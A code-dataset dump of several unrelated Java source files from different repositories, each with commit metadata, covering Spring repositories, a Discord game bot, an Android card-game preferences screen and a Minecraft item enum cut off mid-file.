package com.navi.repository; import com.navi.dto.FeedbackDTO; import org.springframework.data.domain.Page; import org.springframework.data.domain.Pageable; import org.springframework.data.repository.CrudRepository; import java.util.List; public interface FeedbackRepository extends CrudRepository<FeedbackDTO, Long>{ public FeedbackDTO save(FeedbackDTO feedbackDTO); //改为分页查询。。。管理后台提供一个管理回复的功能页面。。。可以用户编辑逐条回复用户 //查询所有 //public List<FeedbackDTO> findAll(); public Page<FeedbackDTO> findAll(Pageable pageable); public FeedbackDTO findById(long id);//基于feedback自身的id查询 public Page<FeedbackDTO> findByUserid(long userid, Pageable pageable);//基于用户的id查询 }
[ "wudengfeng@yidian-inc.com" ]
wudengfeng@yidian-inc.com
7e1ac6791df9edf6cf401dd88d4a879ba1e263b9
3f1fe967ece5f06939c9766292caa86e6943c6fa
/src/main/java/net/abdymazhit/dangerbot/channels/game/ReadyChannel.java
980c97be677ebc1bc96647a97dbe9fb999336785
[]
no_license
kexxnoz/DangerBot
c19f309d94feb192a53466462a9752db4ccfe7fa
e023ae56d0465911fdfb0f1603d44bc54c2b6e8d
refs/heads/master
2023-09-06T03:49:47.861062
2021-11-06T16:11:04
2021-11-06T16:11:04
null
0
0
null
null
null
null
UTF-8
Java
false
false
10,766
java
package net.abdymazhit.dangerbot.channels.game; import net.abdymazhit.dangerbot.DangerBot; import net.abdymazhit.dangerbot.customs.Channel; import net.abdymazhit.dangerbot.customs.UserAccount; import net.abdymazhit.dangerbot.enums.GameState; import net.abdymazhit.dangerbot.managers.GameCategoryManager; import net.dv8tion.jda.api.EmbedBuilder; import net.dv8tion.jda.api.Permission; import net.dv8tion.jda.api.entities.Message; import net.dv8tion.jda.api.entities.MessageEmbed; import net.dv8tion.jda.api.entities.TextChannel; import net.dv8tion.jda.api.requests.restaction.ChannelAction; import java.util.*; import java.util.concurrent.atomic.AtomicInteger; /** * Канал готовности к игре * * @version 23.10.2021 * @author Islam Abdymazhit */ public class ReadyChannel extends Channel { /** Менеджер категория игры */ private final GameCategoryManager gameCategoryManager; /** Информационное сообщение готовности к игре игроков */ public Message channelReadyMessage; /** Время для подготовки к игре игроков */ private static final int readyTime = 120; /** Оставшееся время для подготовки */ private final AtomicInteger time; /** Таймер обратного отсчета */ public Timer timer; /** Список имен неготовых к игре игроков */ public List<String> unreadyList; /** Список имен готовых к игре игроков */ public List<String> readyList; /** * Инициализирует канал готовности к игре * @param gameCategoryManager Менеджер категория игры */ public ReadyChannel(GameCategoryManager gameCategoryManager) { this.gameCategoryManager = gameCategoryManager; time = new AtomicInteger(readyTime); unreadyList = new ArrayList<>(); unreadyList.add(gameCategoryManager.game.firstTeamInfo.captain.username); unreadyList.add(gameCategoryManager.game.secondTeamInfo.captain.username); for(UserAccount playerAccount : gameCategoryManager.game.playersAccounts) { unreadyList.add(playerAccount.username); } readyList = new ArrayList<>(); ChannelAction<TextChannel> createAction = gameCategoryManager.category.createTextChannel("ready").setPosition(2).setSlowmode(5) .addPermissionOverride(DangerBot.getInstance().guild.getPublicRole(), null, EnumSet.of(Permission.VIEW_CHANNEL)) .addPermissionOverride(gameCategoryManager.game.firstTeamInfo.captain.member, EnumSet.of(Permission.VIEW_CHANNEL), null) .addPermissionOverride(gameCategoryManager.game.secondTeamInfo.captain.member, EnumSet.of(Permission.VIEW_CHANNEL), null); for(UserAccount playerAccount : gameCategoryManager.game.playersAccounts) { createAction = createAction.addPermissionOverride(playerAccount.member, EnumSet.of(Permission.VIEW_CHANNEL), null); } createAction.addPermissionOverride(gameCategoryManager.game.assistantAccount.member, EnumSet.of(Permission.VIEW_CHANNEL), null).queue(textChannel -> { channel = textChannel; // Отправляет игрокам личное сообщение о найденности игры MessageEmbed messageEmbed = getPrivateMessage(); gameCategoryManager.game.firstTeamInfo.captain.member.getUser().openPrivateChannel().queue(privateChannel -> privateChannel.sendMessageEmbeds(messageEmbed).queue()); gameCategoryManager.game.secondTeamInfo.captain.member.getUser().openPrivateChannel().queue(privateChannel -> privateChannel.sendMessageEmbeds(messageEmbed).queue()); for(UserAccount userAccount : gameCategoryManager.game.playersAccounts) { userAccount.member.getUser().openPrivateChannel().queue(privateChannel -> privateChannel.sendMessageEmbeds(messageEmbed).queue()); } // Отправляет главное сообщение канала EmbedBuilder embedBuilder = new EmbedBuilder(); embedBuilder.setTitle("Первая стадия игры - Готовность к игре"); embedBuilder.setColor(3092790); embedBuilder.setDescription(""" Все игроки должны подтвердить, что они готовы к игре! Обратите внимание, как только Вы станете готовым к игре, мы имеем полное право выдать Вам предупреждение, если Вы не сыграете эту игру! Также, игроки, которые не стали готовными к игре - получают блокировку аккаунта на 10 минут. Стать готовым к игре `/ready`"""); textChannel.sendMessageEmbeds(embedBuilder.build()).queue(message -> channelMessage = message); embedBuilder.clear(); updateReadyMessage(); }); } /** * Обновляет сообщение о готовности к игре игроков */ public void updateReadyMessage() { if(timer != null) { timer.cancel(); } if(unreadyList.size() == 0) { gameCategoryManager.setGameState(GameState.PLAYERS_CHOICE); channel.editMessageEmbedsById(channelReadyMessage.getId(), getReadyMessage(-1, true)).queue(message -> new Timer().schedule(new TimerTask() { @Override public void run() { gameCategoryManager.createPlayersPickChannel(); } }, 7000)); } else { timer = new Timer(); timer.schedule(new TimerTask() { @Override public void run() { if(time.get() % 2 == 0) { if(channelReadyMessage == null) { channel.sendMessageEmbeds(getReadyMessage(time.get(), false)).queue(message -> channelReadyMessage = message); } else { if(time.get() != 0) { channel.editMessageEmbedsById(channelReadyMessage.getId(), getReadyMessage(time.get(), false)).queue(); } else { channel.editMessageEmbedsById(channelReadyMessage.getId(), getReadyMessage(-1, false)).queue(); } } } if(time.get() == 0) { DangerBot.getInstance().gameManager.deleteGame(gameCategoryManager.game); for(String playerName : unreadyList) { int userId = DangerBot.getInstance().database.getUserIdByUsername(playerName); if(userId > 0) { DangerBot.getInstance().database.banPlayer(null, userId, 10); } } new Timer().schedule(new TimerTask() { @Override public void run() { DangerBot.getInstance().gameManager.deleteGame(gameCategoryManager.category.getId()); } }, 7000); cancel(); } time.getAndDecrement(); } }, 0, 1000); } } /** * Получает сообщение о готовности к игре игроков * @param time Время до конца готовности * @param isReady Значение готовности к игре * @return Сообщение о готовности к игре игроков */ private MessageEmbed getReadyMessage(int time, boolean isReady) { EmbedBuilder embedBuilder = new EmbedBuilder(); embedBuilder.setColor(3092790); String description = """ Готовых к игре игроков: `%ready_count%` Неготовых к игре игроков: `%unready_count%` Оставшееся время для подготовки: `%time% сек.`"""; description = description.replace("%ready_count%", String.valueOf(readyList.size())); description = description.replace("%unready_count%", String.valueOf(unreadyList.size())); if(time >= 0) { embedBuilder.setTitle("Готовность к игре"); description = description.replace("%time%", String.valueOf(time)); } else { if(isReady) { embedBuilder.setTitle("Начало игры..."); } else { embedBuilder.setTitle("Отмена игры..."); } description = description.replace("%time%", String.valueOf(0)); } embedBuilder.setDescription(description); MessageEmbed messageEmbed = embedBuilder.build(); embedBuilder.clear(); return messageEmbed; } /** * Получает отправляемое личное сообщение * @return Отправляемое личное сообщение */ private MessageEmbed getPrivateMessage() { EmbedBuilder embedBuilder = new EmbedBuilder(); embedBuilder.setTitle("У вас найдена игра!"); embedBuilder.setColor(3092790); embedBuilder.setDescription(""" Просим Вас написать команду `/ready` для подтверждения готовности к игре! Если Вы не станете готовым к игре в течении `2 минут`, то получите блокировку аккаунта на `10 минут`!"""); embedBuilder.addField("Id игры", gameCategoryManager.category.getName(), true); embedBuilder.addField("Помощник", gameCategoryManager.game.assistantAccount.username, true); MessageEmbed messageEmbed = embedBuilder.build(); embedBuilder.clear(); return messageEmbed; } }
[ "islam.abdymazhit@gmail.com" ]
islam.abdymazhit@gmail.com
7a082d89d8aea7d2766bea25929330010848dc92
e58a67e35dc304bc2f12b29fc30a6f2232c22fb2
/guvnor-ng/guvnor-editors/guvnor-guided-dtable-editor/guvnor-guided-dtable-editor-api/src/main/java/org/kie/guvnor/guided/dtable/model/conversion/ConversionMessageType.java
867444008e7f002cadde71d745201afa86e50718
[ "Apache-2.0" ]
permissive
jsvitak/guvnor
5dae69f5775ba4c2946e38ad8ce41c86f89a63a0
56f6d6fb0c970d27f1179e2a4923569d6134e7c6
refs/heads/master
2021-01-16T22:49:47.978385
2013-02-21T16:05:56
2013-02-21T16:06:28
null
0
0
null
null
null
null
UTF-8
Java
false
false
229
java
package org.kie.guvnor.guided.dtable.model.conversion; /** * Types of message */ import org.jboss.errai.common.client.api.annotations.Portable; @Portable public enum ConversionMessageType { INFO, WARNING, ERROR }
[ "michael.anstis@gmail.com" ]
michael.anstis@gmail.com
321cfd16aab379a09103b1a6d5d11c209b3fd423
5216e3ee8ca25414a749eb59223ebcd7aa4ae2e4
/ddbuy-manage-web/src/main/java/com/ddbuy/ddbuymanageweb/utils/FastDfsUtil.java
1795964ecd7e6a22ccd306ce2ba3943d1b887b9b
[]
no_license
sty0715/ddbuy-parent
ae4f3db602624ef8259da4e898d928530958b55f
d15e3bc6057309f95b835c979c95a37d8c89c489
refs/heads/master
2023-08-04T07:44:44.352189
2019-08-08T03:33:28
2019-08-08T03:33:28
201,153,707
0
0
null
2023-07-22T12:59:52
2019-08-08T01:23:47
JavaScript
UTF-8
Java
false
false
1,269
java
package com.ddbuy.ddbuymanageweb.utils; import org.csource.common.MyException; import org.csource.fastdfs.*; import org.springframework.beans.factory.annotation.Value; import org.springframework.stereotype.Component; import java.io.IOException; @Component public class FastDfsUtil { @Value(value = "${nginx.fastdfs.address}") private String nginx_fastdfs_address; @Value(value = "${nginx.fastdfs.port}") private String nginx_fastdfs_port; public String uploadFile(byte[] bs,String expname){ String filePath=null; try { ClientGlobal.init("fastdfs.properties"); //2.创建tracker服务器对象 TrackerClient client=new TrackerClient(); TrackerServer trackerServer=client.getConnection(); //3.创建storage客户端 StorageServer storageServer=null; StorageClient storageClient=new StorageClient(trackerServer,storageServer); //4.上传图片 String [] infos=storageClient.upload_file(bs,expname,null); filePath=nginx_fastdfs_address+":"+nginx_fastdfs_port+"/"+infos[0]+"/"+infos[1]; } catch (Exception e) { e.printStackTrace(); } return filePath; } }
[ "674892583@qq.com" ]
674892583@qq.com
4f63cf57809d13ae1a405893df96f66923d9f975
726cf01270d48994defec40733a0e69ac4c72d78
/src/main/java/com/tsystems/tschool/logiweb/services/CargoService.java
aaecefc0abe8c4ccd37c103bce6ee65adcb51ca0
[]
no_license
raspyatnikov/tschool
d2d14031eb252abfec368619896c7c724ac2c1f3
1e1eb678b8b003fe1fc639d07b8a98acce1ee78f
refs/heads/master
2021-07-16T04:52:37.446686
2017-10-23T08:00:01
2017-10-23T08:00:01
107,146,413
0
0
null
null
null
null
UTF-8
Java
false
false
550
java
package com.tsystems.tschool.logiweb.services; import com.tsystems.tschool.logiweb.entities.Cargo; import com.tsystems.tschool.logiweb.services.exceptions.ServiceException; import org.springframework.transaction.annotation.Transactional; public interface CargoService { int addCargo(Cargo newCargo) throws ServiceException; @Transactional void setPickedUpStatus(int cargoId) throws IllegalStateException, ServiceException; @Transactional void setDeliveredStatus(int cargoId) throws IllegalStateException, ServiceException; }
[ "ilyar2008@gmail.com" ]
ilyar2008@gmail.com
39b49b2d2b4d45061772b2c86312a0702084f6ce
fa91450deb625cda070e82d5c31770be5ca1dec6
/Diff-Raw-Data/17/17_8875edb1e8449962f693883c2a820f82ef07b750/PreferencesActivity/17_8875edb1e8449962f693883c2a820f82ef07b750_PreferencesActivity_s.java
f6619358682fe0bb8f5c8bb42190e44648c88475
[]
no_license
zhongxingyu/Seer
48e7e5197624d7afa94d23f849f8ea2075bcaec0
c11a3109fdfca9be337e509ecb2c085b60076213
refs/heads/master
2023-07-06T12:48:55.516692
2023-06-22T07:55:56
2023-06-22T07:55:56
259,613,157
6
2
null
2023-06-22T07:55:57
2020-04-28T11:07:49
null
UTF-8
Java
false
false
11,393
java
package com.worthwhilegames.cardgames.shared.activities; import static com.worthwhilegames.cardgames.shared.Constants.CONNECTION_TYPE; import static com.worthwhilegames.cardgames.shared.Constants.DIFFICULTY_OF_COMPUTERS; import static com.worthwhilegames.cardgames.shared.Constants.EASY; import static com.worthwhilegames.cardgames.shared.Constants.GAME_TYPE; import static com.worthwhilegames.cardgames.shared.Constants.LANGUAGE; import static com.worthwhilegames.cardgames.shared.Constants.NUMBER_OF_COMPUTERS; import static com.worthwhilegames.cardgames.shared.Constants.PREFERENCES; import static com.worthwhilegames.cardgames.shared.Constants.SOUND_EFFECTS; import static com.worthwhilegames.cardgames.shared.Constants.SPEECH_VOLUME; import java.util.ArrayList; import java.util.Arrays; import java.util.List; import android.app.Activity; import android.content.Context; import android.content.SharedPreferences; import android.media.AudioManager; import android.os.Bundle; import android.widget.ArrayAdapter; import android.widget.CheckBox; import android.widget.SeekBar; import android.widget.SeekBar.OnSeekBarChangeListener; import android.widget.Spinner; import android.widget.TextView; import com.worthwhilegames.cardgames.R; import com.worthwhilegames.cardgames.shared.CardGame; import com.worthwhilegames.cardgames.shared.Language; import com.worthwhilegames.cardgames.shared.connection.ConnectionType; /** * This class will be used as an activity for the preferences screen. Within * this activity a user will be able to set up their options for the current * game including choosing the locale, number of computer players, the difficult * of the AI players, volume control and options to enable and disable sounds. */ public class PreferencesActivity extends Activity { /** * An AudioManager object to be used for controlling the game volume */ private AudioManager audioManager; /** * A SharedPreferences object to get the preferences set by the user */ private SharedPreferences sharedPref; /** * A SharedPreferences editor for changing the game preferences based on * user input */ private SharedPreferences.Editor prefsEditor; /** * A private Spinner variable for the number of computer option */ private Spinner numComputerSpinner; /** * A private Spinner variable for the locale option */ private Spinner localeSpinner; /** * A private Spinner variable for game type */ private Spinner gameSpinner; /** * A private Spinner variable for the difficulty of computers */ private Spinner difficultySpinner; /** * A private Spinner variable for the connection type */ private Spinner connectionSpinner; /* (non-Javadoc) * @see android.app.Activity#onCreate(android.os.Bundle) */ @Override protected void onCreate(Bundle savedInstanceState) { super.onCreate(savedInstanceState); setContentView(R.layout.preferences); // Get and change the title of the Preferences layout TextView title = (TextView) findViewById(R.id.title); title.setText(R.string.preferencesActivityTitle); // create the auidio manager for controlling the volume audioManager = (AudioManager) getSystemService(Context.AUDIO_SERVICE); // create the shared preferences object sharedPref = this.getSharedPreferences(PREFERENCES, 0); // create the preferences editor for editing the preferences prefsEditor = sharedPref.edit(); // Seek Bar from the layout SeekBar volumeBar = (SeekBar) findViewById(R.id.volume); // set the volume progress bar to the media volume of the device volumeBar.setProgress(audioManager.getStreamVolume(AudioManager.STREAM_MUSIC)); // set the max volume to the max volume of the device int maxVolume = audioManager.getStreamMaxVolume(AudioManager.STREAM_MUSIC); // set the bar volumeBar.setMax(maxVolume); // create a listener for the volume bar changing volumeBar.setOnSeekBarChangeListener(new OnSeekBarChangeListener() { /* (non-Javadoc) * @see android.widget.SeekBar.OnSeekBarChangeListener#onStopTrackingTouch(android.widget.SeekBar) */ @Override public void onStopTrackingTouch(SeekBar seekBar) { } /* (non-Javadoc) * @see android.widget.SeekBar.OnSeekBarChangeListener#onStartTrackingTouch(android.widget.SeekBar) */ @Override public void onStartTrackingTouch(SeekBar seekBar) { } /* (non-Javadoc) * @see android.widget.SeekBar.OnSeekBarChangeListener#onProgressChanged(android.widget.SeekBar, int, boolean) */ @Override public void onProgressChanged(SeekBar seekBar, int progress, boolean fromUser) { // if the volume bar is changed then change the device volume to // the new level audioManager.setStreamVolume(AudioManager.STREAM_MUSIC, progress, 0); } }); // Sound effects checkbox object CheckBox soundEffects = (CheckBox) findViewById(R.id.checkBoxSoundEffects); if (soundEffects != null) { // set the check box to it's preference soundEffects.setChecked(sharedPref.getBoolean(SOUND_EFFECTS, true)); } // speech check box CheckBox speechVolume = (CheckBox) findViewById(R.id.checkBoxSpeechVolume); if (speechVolume != null) { // set the check box to it's preference speechVolume.setChecked(sharedPref.getBoolean(SPEECH_VOLUME, true)); } // Number of Computers from the shared preferences numComputerSpinner = (Spinner) findViewById(R.id.spinnerNumComputers); if (numComputerSpinner != null) { // get the value from shared preferences Integer numberOfComputers = sharedPref.getInt(NUMBER_OF_COMPUTERS, 3); // make an array adapter of all options specified in the xml @SuppressWarnings("unchecked") ArrayAdapter<String> numCompAdapter = (ArrayAdapter<String>) numComputerSpinner.getAdapter(); // find the current position int spinnerPosition = numCompAdapter.getPosition(numberOfComputers.toString()); // set the correct position to true numComputerSpinner.setSelection(spinnerPosition); } // get the value of the option from the shared preferences difficultySpinner = (Spinner) findViewById(R.id.difficultyOption); // set the correct radio button based on the shared preferences if (difficultySpinner != null) { // get the value from shared preferences String difficulty = sharedPref.getString(DIFFICULTY_OF_COMPUTERS, EASY); // make an array adapter of all options specified in the xml @SuppressWarnings("unchecked") ArrayAdapter<String> difficultyAdapter = (ArrayAdapter<String>) difficultySpinner.getAdapter(); // cast to an ArrayAdapter // find the current position of the preference int difficultyPosition = difficultyAdapter.getPosition(difficulty); // set the position to true difficultySpinner.setSelection(difficultyPosition); } // based on the value of the language from the preferences set the // correct radio button localeSpinner = (Spinner) findViewById(R.id.langOption); ArrayAdapter<Language> localeAdapter = new ArrayAdapter<Language>(this, android.R.layout.simple_spinner_item, Language.values()); localeAdapter.setDropDownViewResource(android.R.layout.simple_spinner_dropdown_item); localeSpinner.setAdapter(localeAdapter); if (localeSpinner != null) { // get the value from shared preferences Language language = null; try { language = Language.valueOf(sharedPref.getString(LANGUAGE, Language.US.toString())); } catch (IllegalArgumentException ex) { language = Language.US; } // get the position of the current item int localePosition = localeAdapter.getPosition(language); // set the correct position localeSpinner.setSelection(localePosition); } // Game type spinner gameSpinner = (Spinner) findViewById(R.id.gameOption); ArrayAdapter<CardGame> gameAdapter = new ArrayAdapter<CardGame>(this, android.R.layout.simple_spinner_item, CardGame.values()); gameAdapter.setDropDownViewResource(android.R.layout.simple_spinner_dropdown_item); gameSpinner.setAdapter(gameAdapter); if (gameSpinner != null) { // value of the game type based upon the shared preferences CardGame gameType = CardGame.valueOf(sharedPref.getString(GAME_TYPE, CardGame.CrazyEights.toString())); // get the current position of the selected item int gamePosition = gameAdapter.getPosition(gameType); // set the option checked based on the preferences gameSpinner.setSelection(gamePosition); } // connection type spinner connectionSpinner = (Spinner) findViewById(R.id.connectionOption); ConnectionType[] connectionTypes = ConnectionType.values(); List<ConnectionType> modifiedConnectionTypes = new ArrayList<ConnectionType>(Arrays.asList(connectionTypes)); ArrayAdapter<ConnectionType> connectionAdapter = new ArrayAdapter<ConnectionType>(this, android.R.layout.simple_spinner_item, modifiedConnectionTypes); connectionAdapter.setDropDownViewResource(android.R.layout.simple_spinner_dropdown_item); connectionSpinner.setAdapter(connectionAdapter); if (connectionSpinner != null) { // value of the game type based upon the shared preferences ConnectionType connectionType = ConnectionType.valueOf(sharedPref.getString(CONNECTION_TYPE, ConnectionType.WiFi.toString())); // get the current position of the selected item int connectionPosition = connectionAdapter.getPosition(connectionType); // set the option checked based on the preferences connectionSpinner.setSelection(connectionPosition); } } /* (non-Javadoc) * @see android.app.Activity#onBackPressed() */ @Override public void onBackPressed() { // get the values for the sound options from the preferences CheckBox soundEffects = (CheckBox) findViewById(R.id.checkBoxSoundEffects); CheckBox speechVolume = (CheckBox) findViewById(R.id.checkBoxSpeechVolume); // set the result of the activity setResult(RESULT_OK); // put the new preferences in the shared preferences // add the sound effects preference if (soundEffects != null) { prefsEditor.putBoolean(SOUND_EFFECTS, soundEffects.isChecked()); } // add the speech volume preference if (speechVolume != null) { prefsEditor.putBoolean(SPEECH_VOLUME, speechVolume.isChecked()); } // set number of computers if (numComputerSpinner != null) { prefsEditor.putInt(NUMBER_OF_COMPUTERS, Integer.parseInt((String) numComputerSpinner.getSelectedItem())); } // set difficulty of computers to preferences if (difficultySpinner != null) { prefsEditor.putString(DIFFICULTY_OF_COMPUTERS, (String) difficultySpinner.getSelectedItem()); } // set language to preferences if (localeSpinner != null) { prefsEditor.putString(LANGUAGE, localeSpinner.getSelectedItem().toString()); } // set game type if (gameSpinner != null) { prefsEditor.putString(GAME_TYPE, gameSpinner.getSelectedItem().toString()); } // set connection type if (gameSpinner != null) { prefsEditor.putString(CONNECTION_TYPE, connectionSpinner.getSelectedItem().toString()); } // commit the changes to the shared preferences prefsEditor.commit(); // finish the activity finish(); } }
[ "yuzhongxing88@gmail.com" ]
yuzhongxing88@gmail.com
a32103ad053f14d71777f6035214d0b0577af845
f7be265f9fbe618d12fdd22a6299869ac21688b6
/Practice1/src/java8lambda/Java8ForEachExample.java
f37f91ce7fef111872fdb1636877206ebd92a6d9
[]
no_license
deepesh914/JavaCode
51c6ccaaadeeea77afebc174c5d9c34fd45f9095
f91f90145631b2d129288e9cae4bd22961392e78
refs/heads/main
2023-07-02T10:44:28.751765
2021-08-10T15:18:45
2021-08-10T15:18:45
383,512,825
1
0
null
null
null
null
UTF-8
Java
false
false
1,137
java
package java8lambda; import java.util.ArrayList; import java.util.Iterator; import java.util.List; import java.util.function.Consumer; import java.lang.Integer; public class Java8ForEachExample { public static void main(String[] args) { //creating sample Collection List<Integer> myList = new ArrayList<Integer>(); for(int i=0; i<10; i++) myList.add(i); //traversing using Iterator Iterator<Integer> it = myList.iterator(); while(it.hasNext()){ Integer i = it.next(); System.out.println("Iterator Value::"+i); } //traversing through forEach method of Iterable with anonymous class myList.forEach(new Consumer<Integer>() { public void accept(Integer t) { System.out.println("forEach anonymous class Value::"+t); } }); //traversing with Consumer interface implementation MyConsumer action = new MyConsumer(); myList.forEach(action); } } //Consumer implementation that can be reused class MyConsumer implements Consumer<Integer>{ public void accept(Integer t) { System.out.println("Consumer impl Value::"+t); } }
[ "Deepesh.Gupta@in.bosch.com" ]
Deepesh.Gupta@in.bosch.com
7834315866774c92c21c408b4f5e396136f42509
9bc4874b792842c7daa8393df3154d5940869430
/app/src/main/java/com/shabsudemy/fragmenttutorial/fragmenttransation/FragmentTransationActivity.java
b66eb7ae4eb559e2531e9c596d5dee40dfba7338
[]
no_license
muhammedshihabvk/FragmentTutorialPOC
21fe3ee9e1890cbf9501e6971a548f30d098555a
77f781937854015b2801176e9dabccece424c354
refs/heads/master
2023-06-12T03:44:39.353831
2021-07-02T05:25:46
2021-07-02T05:25:46
382,222,959
0
0
null
null
null
null
UTF-8
Java
false
false
435
java
package com.shabsudemy.fragmenttutorial.fragmenttransation; import androidx.appcompat.app.AppCompatActivity; import android.os.Bundle; import com.shabsudemy.fragmenttutorial.R; public class FragmentTransationActivity extends AppCompatActivity { @Override protected void onCreate(Bundle savedInstanceState) { super.onCreate(savedInstanceState); setContentView(R.layout.activity_fragment_transation); } }
[ "shihabvk99@gmail.com" ]
shihabvk99@gmail.com
a0fd7d17345a6599f77a6d7bc722569e2bcafd45
ce74dca9294b652e1b088ee0cb1da655104e9337
/Mynerim/src/net/mcshockwave/Mynerim/Items/ItemGen.java
cf7a60cabfd7d8a440ad575e5bfd222f1ccb18b8
[]
no_license
MCShockwave/Mynerim-SG
7d3c0e764fbac07e635103f276da45f51d10ee8f
1b57b3e255297f4aa9083d8fe2596672180081d3
refs/heads/master
2020-12-03T03:53:37.916130
2014-10-04T18:44:50
2014-10-04T18:44:50
18,245,424
0
0
null
null
null
null
UTF-8
Java
false
false
9,197
java
package net.mcshockwave.Mynerim.Items; import java.util.ArrayList; import java.util.Arrays; import java.util.HashMap; import java.util.List; import java.util.Map; import java.util.Random; import net.mcshockwave.MCS.Utils.ItemMetaUtils; import net.mcshockwave.Spells.Spell; import org.apache.commons.lang.WordUtils; import org.bukkit.ChatColor; import org.bukkit.Material; import org.bukkit.enchantments.Enchantment; import org.bukkit.inventory.ItemStack; public enum ItemGen { // Swords Warhammer( Material.STONE_SWORD, 55, Type.Sword, Enchantment.KNOCKBACK, 2), Longsword( Material.IRON_SWORD, 50, Type.Sword, Enchantment.KNOCKBACK, 1), Iron_Sword( Material.IRON_SWORD, 50, Type.Sword), Steel_Sword( Material.IRON_SWORD, 45, Type.Sword, Enchantment.DAMAGE_ALL, 1), Elven_Sword( Material.GOLD_SWORD, 40, Type.Sword, Enchantment.DAMAGE_ALL, 3), Glass_Sword( Material.DIAMOND_SWORD, 35, Type.Sword, Enchantment.DAMAGE_ALL, 1), Dwarven_Sword( Material.GOLD_SWORD, 30, Type.Sword, Enchantment.DAMAGE_ALL, 4), Orcish_Sword( Material.GOLD_SWORD, 25, Type.Sword, Enchantment.DAMAGE_ALL, 5), Ebony_Sword( Material.DIAMOND_SWORD, 20, Type.Sword, Enchantment.DAMAGE_ALL, 3), Daedric_Sword( Material.DIAMOND_SWORD, 15, Type.Sword, Enchantment.DAMAGE_ALL, 4), Dragonbone_Sword( Material.DIAMOND_SWORD, 10, Type.Sword, Enchantment.DAMAGE_ALL, 5), // Armor Leather( ArmorMat.LEATHER, 60), Iron( ArmorMat.IRON, 55), Steel( ArmorMat.IRON, 50, Enchantment.PROTECTION_ENVIRONMENTAL, 1), Steel_Plate( ArmorMat.CHAINMAIL, 45, Enchantment.PROTECTION_ENVIRONMENTAL, 3), Scaled( ArmorMat.CHAINMAIL, 45, Enchantment.PROTECTION_ENVIRONMENTAL, 3), Glass( ArmorMat.DIAMOND, 40), Elven( ArmorMat.GOLD, 35, Enchantment.PROTECTION_ENVIRONMENTAL, 3), Dwarven( ArmorMat.GOLD, 30, Enchantment.PROTECTION_ENVIRONMENTAL, 4), Orcish( ArmorMat.GOLD, 30, Enchantment.PROTECTION_ENVIRONMENTAL, 4), Ebony( ArmorMat.DIAMOND, 25, Enchantment.PROTECTION_ENVIRONMENTAL, 2), Daedric( ArmorMat.DIAMOND, 20, Enchantment.PROTECTION_ENVIRONMENTAL, 3), Dragonplate( ArmorMat.DIAMOND, 15, Enchantment.PROTECTION_ENVIRONMENTAL, 4), // Bows Long_Bow( Material.BOW, 50, Type.Bow), Hunting_Bow( Material.BOW, 45, Type.Bow, Enchantment.ARROW_KNOCKBACK, 1), Ancient_Nord_Bow( Material.BOW, 40, Type.Bow, Enchantment.ARROW_DAMAGE, 1), Imperial_Bow( Material.BOW, 35, Type.Bow, Enchantment.ARROW_DAMAGE, 1, Enchantment.ARROW_KNOCKBACK, 1), Orcish_Bow( Material.BOW, 30, Type.Bow, Enchantment.ARROW_DAMAGE, 2), Dwarven_Bow( Material.BOW, 25, Type.Bow, Enchantment.ARROW_DAMAGE, 2, Enchantment.ARROW_KNOCKBACK, 1), Elven_Bow( Material.BOW, 20, Type.Bow, Enchantment.ARROW_DAMAGE, 3), Glass_Bow( Material.BOW, 15, Type.Bow, Enchantment.ARROW_DAMAGE, 4), Ebony_Bow( Material.BOW, 10, Type.Bow, Enchantment.ARROW_DAMAGE, 4, Enchantment.ARROW_KNOCKBACK, 1), Daedric_Bow( Material.BOW, 5, Type.Bow, Enchantment.ARROW_DAMAGE, 5), Dragonbone_Bow( Material.BOW, 1, Type.Bow, Enchantment.ARROW_DAMAGE, 5, Enchantment.ARROW_KNOCKBACK, 1), // FOOD Sweet_Roll( Material.CAKE, 1, Type.Food), Carrots( Material.CARROT_ITEM, 1, Type.Food), Baked_Potato( Material.BAKED_POTATO, 1, Type.Food), Loaf_of_Bread( Material.BREAD, 1, Type.Food), Apple( Material.APPLE, 1, Type.Food), Chicken_Breast( Material.COOKED_CHICKEN, 1, Type.Food), Salmon_Meat( Material.COOKED_FISH, 1, 1, Type.Food), Horker_Meat( Material.COOKED_BEEF, 1, Type.Food), Horse_Meat( Material.COOKED_BEEF, 1, Type.Food), Leg_of_Goat( Material.COOKED_CHICKEN, 1, Type.Food), Pheasant_Breast( Material.COOKED_CHICKEN, 1, Type.Food), Raw_Beef( Material.RAW_BEEF, 1, Type.Food), Raw_Rabbit_Leg( Material.RAW_CHICKEN, 1, Type.Food), Venison( Material.COOKED_BEEF, 1, Type.Food), Apple_Cabbage_Stew( Material.MUSHROOM_SOUP, 1, Type.Food), Beef_Stew( Material.MUSHROOM_SOUP, 1, Type.Food), Cabbage_Potato_Soup( Material.MUSHROOM_SOUP, 1, Type.Food), Horker_Stew( Material.MUSHROOM_SOUP, 1, Type.Food), Tomato_Stew( Material.MUSHROOM_SOUP, 1, Type.Food), Vegetable_Stew( Material.MUSHROOM_SOUP, 1, Type.Food), Venison_Stew( Material.MUSHROOM_SOUP, 1, Type.Food), Potato( Material.POTATO_ITEM, 1, Type.Food), Apple_Pie( Material.PUMPKIN_PIE, 1, Type.Food), Cheese_Wheel( Material.PUMPKIN_PIE, 1, Type.Food), // drinks Ale( Material.POTION, 8193, 1, Type.Food), Alto_Wine( Material.POTION, 8225, 1, Type.Food), Black_Briar_Mead( Material.POTION, 8257, 1, Type.Food), Honningbrew_Mead( Material.POTION, 8257, 1, Type.Food), Mead_with_Juniper_Berry( Material.POTION, 8226, 1, Type.Food), // Other, Arrow( Material.ARROW, 5, Type.Other), // Spells Flames( Spell.Flames.item, 100, Type.Spell), Healing( Spell.Healing.item, 90, Type.Spell), Lesser_Ward( Spell.Lesser_Ward.item, 100, Type.Spell), Lightning_Bolt( Spell.Lightning_Bolt.item, 90, Type.Spell), Frost_Rune( Spell.Frost_Rune.item, 85, Type.Spell), Ice_Storm( Spell.Ice_Storm.item, 80, Type.Spell), Lightning_Cloak( Spell.Lightning_Cloak.item, 80, Type.Spell), Incinerate( Spell.Incinerate.item, 50, Type.Spell), Wall_of_Frost( Spell.Wall_of_Frost.item, 50, Type.Spell), Blizzard( Spell.Blizzard.item, 5, Type.Spell), Steadfast_Ward( Spell.Steadfast_Ward.item, 80, Type.Spell), Greater_Ward( Spell.Greater_Ward.item, 75, Type.Spell), Guardian_Circle( Spell.Guardian_Circle.item, 10, Type.Spell); private Material type = null; private short data = 0; private ArmorMat amat = null; public int weight; public Type t; public String name; public ItemStack exact = null; public HashMap<Enchantment, Integer> enchants = new HashMap<>(); private ItemGen(Material type, int weight, Type t, Object... enchants) { this.type = type; init(weight, 